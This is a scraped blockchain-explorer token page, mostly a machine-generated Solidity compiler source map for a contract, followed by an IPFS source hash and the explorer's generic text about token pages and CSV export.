;;;;;;;;;;;;;;;;;;;;;;1849:80;-1:-1:-1;1830:99:7;1571:391;-1:-1:-1;;;;;1571:391:7:o;4025:98:8:-;4083:7;4110:5;4114:1;4110;:5;:::i;:::-;4103:12;4025:98;-1:-1:-1;;;4025:98:8:o;4246:436:0:-;4353:16;;;4367:1;4353:16;;;;;;;;4312:4;;;;4353:16;4367:1;4353:16;;;;;;;;;;-1:-1:-1;4353:16:0;4329:40;;4398:4;4380;4385:1;4380:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;4380:23:0;;;:7;;;;;;;;;;:23;;;;4424:14;;:21;;;-1:-1:-1;;;4424:21:0;;;;:14;;;;;:19;;:21;;;;;4380:7;;4424:21;;;;;:14;:21;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;4414:4;4419:1;4414:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;4414:31:0;;;:7;;;;;;;;;:31;4456:14;;:196;;-1:-1:-1;;;4456:196:0;;:14;;;:65;;:196;;4536:12;;4456:14;;4579:4;;4606;;4626:15;;4456:196;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;4670:4:0;;4246:436;-1:-1:-1;;;;;;4246:436:0:o;3626:98:8:-;3684:7;3711:5;3715:1;3711;:5;:::i;3269:98::-;3327:7;3354:5;3358:1;3354;:5;:::i;2888:98::-;2946:7;2973:5;2977:1;2973;:5;:::i;14:548:9:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:9;;632:42;;622:70;;688:1;685;678:12;622:70;567:131;:::o;703:315::-;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:9:o;1397:456::-;1474:6;1482;1490;1543:2;1531:9;1522:7;1518:23;1514:32;1511:52;;;1559:1;1556;1549:12;1511:52;1598:9;1585:23;1617:31;1642:5;1617:31;:::i;:::-;1667:5;-1:-1:-1;1724:2:9;1709:18;;1696:32;1737:33;1696:32;1737:33;:::i;:::-;1397:456;;1789:7;;-1:-1:-1;;;1843:2:9;1828:18;;;;1815:32;;1397:456::o;2255:247::-;2314:6;2367:2;2355:9;2346:7;2342:23;2338:32;2335:52;;;2383:1;2380;2373:12;2335:52;2422:9;2409:23;2441:31;2466:5;2441:31;:::i;2507:388::-;2575:6;2583;2636:2;2624:9;2615:7;2611:23;2607:32;2604:52;;;2652:1;2649;2642:12;2604:52;2691:9;2678:23;2710:31;2735:5;2710:31;:::i;:::-;2760:5;-1:-1:-1;2817:2:9;2802:18;;2789:32;2830:33;2789:32;2830:33;:::i;:::-;2882:7;2872:17;;;2507:388;;;;;:::o;2900:380::-;2979:1;2975:12;;;;3022;;;3043:61;;3097:4;3089:6;3085:17;3075:27;;3043:61;3150:2;3142:6;3139:14;3119:18;3116:38;3113:161;;3196:10;3191:3;3187:20;3184:1;3177:31;3231:4;3228:1;3221:15;3259:4;3256:1;3249:15;3113:161;;2900:380;;;:::o;4691:127::-;4752:10;4747:3;4743:20;4740:1;4733:31;4783:4;4780:1;4773:15;4807:4;4804:1;4797:15;4823:125;4888:9;;;4909:10;;;4906:36;;;4922:18;;:::i;4953:251::-;5023:6;5076:2;5064:9;5055:7;5051:23;5047:32;5044:52;;;5092:1;5089;5082:12;5044:52;5124:9;5118:16;5143:31;5168:5;5143:31;:::i;6130:306::-;6218:6;6226;6234;6287:2;6275:9;6266:7;6262:23;6258:32;6255:52;;;6303:1;6300;6293:12;6255:52;6332:9;6326:16;6316:26;;6382:2;6371:9;6367:18;6361:25;6351:35;;6426:2;6415:9;6411:18;6405:25;6395:35;;6130:306;;;;;:::o;9348:217::-;9388:1;9414;9404:132;;9458:10;9453:3;9449:20;9446:1;9439:31;9493:4;9490:1;9483:15;9521:4;9518:1;9511:15;9404:132;-1:-1:-1;9550:9:9;;9348:217::o;9702:127::-;9763:10;9758:3;9754:20;9751:1;9744:31;9794:4;9791:1;9784:15;9818:4;9815:1;9808:15;9834:980;10096:4;10144:3;10133:9;10129:19;10175:6;10164:9;10157:25;10201:2;10239:6;10234:2;10223:9;10219:18;10212:34;10282:3;10277:2;10266:9;10262:18;10255:31;10306:6;10341;10335:13;10372:6;10364;10357:22;10410:3;10399:9;10395:19;10388:26;;10449:2;10441:6;10437:15;10423:29;;10470:1;10480:195;10494:6;10491:1;10488:13;10480:195;;;10559:13;;-1:-1:-1;;;;;10555:39:9;10543:52;;10650:15;;;;10615:12;;;;10591:1;10509:9;10480:195;;;-1:-1:-1;;;;;;;10731:32:9;;;;10726:2;10711:18;;10704:60;-1:-1:-1;;;10795:3:9;10780:19;10773:35;10692:3;9834:980;-1:-1:-1;;;9834:980:9:o;10819:168::-;10892:9;;;10923;;10940:15;;;10934:22;;10920:37;10910:71;;10961:18;;:::i;10992:128::-;11059:9;;;11080:11;;;11077:37;;;11094:18;;:::i

Swarm Source

ipfs://6aee2e4e6d511fea8bec449f620d71dbadfe9575df024ae7a0c2ea52fda8e2e9
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.